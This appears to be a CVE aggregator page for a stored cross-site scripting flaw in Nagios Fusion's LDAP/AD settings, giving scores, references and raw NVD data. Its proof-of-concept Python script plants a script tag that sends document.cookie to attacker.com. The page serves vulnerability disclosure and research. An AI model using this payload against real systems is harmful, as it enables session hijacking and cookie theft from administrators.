CVE-2023-53690

Description

Nagios Fusion versions prior to 4.2.0 contain a stored cross-site scripting (XSS) vulnerability in the LDAP/AD authentication-server configuration. Unsanitized user input can be stored and later rendered in the administrative UI, causing JavaScript to execute in the browser of any user who views the affected page. An attacker who can add authentication servers via LDAP/AD integration could persist a malicious payload that executes in the context of other users' browsers.

CVSS Details

CVSS Score

4.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:nagios:fusion:*:*:*:*:*:*:*:* - VULNERABLE

Nagios Fusion < 4.2.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests import json # CVE-2023-53690 PoC - Nagios Fusion Stored XSS in LDAP/AD Configuration # Target: Nagios Fusion < 4.2.0 # Author: VulnCheck ([email protected]) target_url = "http://target-ip/nagiosfusion" login_url = f"{target_url}/login" ldap_config_url = f"{target_url}/config/authentication/servers/add" session = requests.Session() # Login with admin credentials login_data = { "username": "admin", "password": "admin_password" } response = session.post(login_url, data=login_data) # XSS payload for LDAP server configuration xss_payload = { "server_name": "LDAP-Server-1", "server_address": "ldap://10.0.0.1", "port": "389", "base_dn": f"<script>fetch('https://attacker.com/log?c='+document.cookie)</script>", "bind_dn": "cn=admin,dc=example,dc=com", "bind_password": "admin_password", "user_filter": "(uid=%s)", "group_filter": "(member=%s)" } # Send XSS payload response = session.post(ldap_config_url, data=xss_payload) print("[+] XSS payload sent successfully") print("[+] Payload will execute when admin views LDAP configuration page")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-53690
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-53690
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-53690/
[4] VulDB https://vuldb.com/cve/CVE-2023-53690
[5] https://www.nagios.com/changelog/nagios-fusion/
[6] https://www.nagios.com/products/security/#fusion
[7] https://www.vulncheck.com/advisories/nagios-fusion-ldap-ad-integration-stored-xss

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-53690", "sourceIdentifier": "[email protected]", "published": "2025-10-30T22:15:42.780", "lastModified": "2025-11-06T18:20:19.180", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nagios Fusion versions prior to 4.2.0 contain a stored cross-site scripting (XSS) vulnerability in the LDAP/AD authentication-server configuration. Unsanitized user input can be stored and later rendered in the administrative UI, causing JavaScript to execute in the browser of any user who views the affected page. An attacker who can add authentication servers via LDAP/AD integration could persist a malicious payload that executes in the context of other users' browsers."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nagios:fusion:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.2.0", "matchCriteriaId": "C952BF8F-1658-4707-AB70-427476FC5FB9"}]}]}], "references": [{"url": "https://www.nagios.com/changelog/nagios-fusion/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.nagios.com/products/security/#fusion", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/nagios-fusion-ldap-ad-integration-stored-xss", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}